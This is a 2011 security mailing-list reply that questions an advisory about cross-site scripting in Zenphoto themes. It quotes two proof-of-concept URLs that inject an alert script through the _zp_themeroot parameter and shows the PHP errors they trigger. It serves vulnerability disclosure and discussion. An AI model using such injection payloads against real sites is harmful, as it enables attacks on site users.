[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: HTB22945: Multiple XSS in ZENphoto

To: advisory@xxxxxxxxxxx
Subject: Re: HTB22945: Multiple XSS in ZENphoto
From: Christian Kujau <lists@xxxxxxxxxxxxxxx>
Date: Fri, 22 Apr 2011 14:28:25 -0700 (PDT)

On Thu, 21 Apr 2011 at 13:42, advisory@xxxxxxxxxxx wrote:
> The vulnerability exists due to failure in the "/themes/zenpage/slideshow.php"
> script to properly sanitize user-supplied input in "_zp_themeroot" 
> variable then register_globals is on.

You mean "if register_globals is on"? I thought anything 
relying on register_globals was b0rked anyway?

Zenphoto lists "PHP 5.2+" as its requirements and "register_globals" 
defauts to "off" since PHP 4.2.0.

That being said, the PoC generates some messages in the logs:

> http://[host]/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

PHP Notice:  Undefined variable: _zp_themeroot in 
../zenphoto/themes/zenpage/slideshow.php on line 9
PHP Fatal error:  Call to undefined function zp_apply_filter() in 
../zenphoto/themes/zenpage/slideshow.php on line 10
 
> http://[host]/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

PHP Notice:  Undefined variable: _zp_themeroot in 
../zenphoto/themes/stopdesign/comment_form.php on line 6
PHP Notice:  Undefined variable: disabled in 
../zenphoto/themes/stopdesign/comment_form.php on line 25
PHP Fatal error:  Call to undefined function html_encode() in 
../zenphoto/themes/stopdesign/comment_form.php on line 32

C.
-- 
BOFH excuse #160:

non-redundant fan failure

References:
- HTB22945: Multiple XSS in ZENphoto
  - From: advisory

Prev by Date: XSS in Webmin 1.540 + exploit for privilege escalation
Next by Date: AT-TFTP Server Remote Denial of Service Vulnerability
Previous by thread: HTB22945: Multiple XSS in ZENphoto
Next by thread: HTB22950: SQL injection in 4images
Index(es):
- Date
- Thread